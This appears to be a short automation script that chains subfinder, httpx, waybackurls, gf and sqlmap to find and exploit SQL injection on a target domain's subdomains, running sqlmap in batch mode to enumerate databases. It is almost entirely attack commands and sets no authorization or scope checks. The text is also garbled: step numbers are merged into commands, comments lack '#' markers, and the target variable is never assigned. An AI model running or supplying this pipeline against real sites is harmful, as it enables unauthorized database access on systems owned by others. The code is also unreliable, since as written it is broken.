
subfinder -d target.com | tee -a domains.txt 2 cat domains.txt | httpx|tee -a urls-alive.txt 3 cat urls-alive.txt | waybackurls |tee -a urls-check.txt 4 gf sqli urls-check.txt >> sql.url 5 sqlmap -m sql.url --dbs --batch


if [ $# -eq 0 ] then echo "Please provide the target domain as an argument." exit 1 fi


Create a directory with the target domain name

target_dir="$target_domain-$(date '+%Y-%m-%d_%H:%M:%S')" mkdir $target_dir

Change into the target directory

cd $target_dir

Run Subfinder and output results to domains.txt

subfinder -d $target_domain | tee -a domains.txt

Use httpx to find alive URLs and output results to urls-alive.txt

cat domains.txt | httpx | tee -a urls-alive.txt

Use waybackurls to find URLs from archive and output results to urls-check.txt

cat urls-alive.txt | waybackurls | tee -a urls-check.txt

Use gf to find SQL injection vulnerabilities and output results to sql.url

gf sqli urls-check.txt >> sql.url

Use sqlmap to test SQL injection on vulnerable URLs and output results to file

sqlmap -m sql.url --dbs --batch > sqlmap-results.txt

Go back to the parent directory

cd ..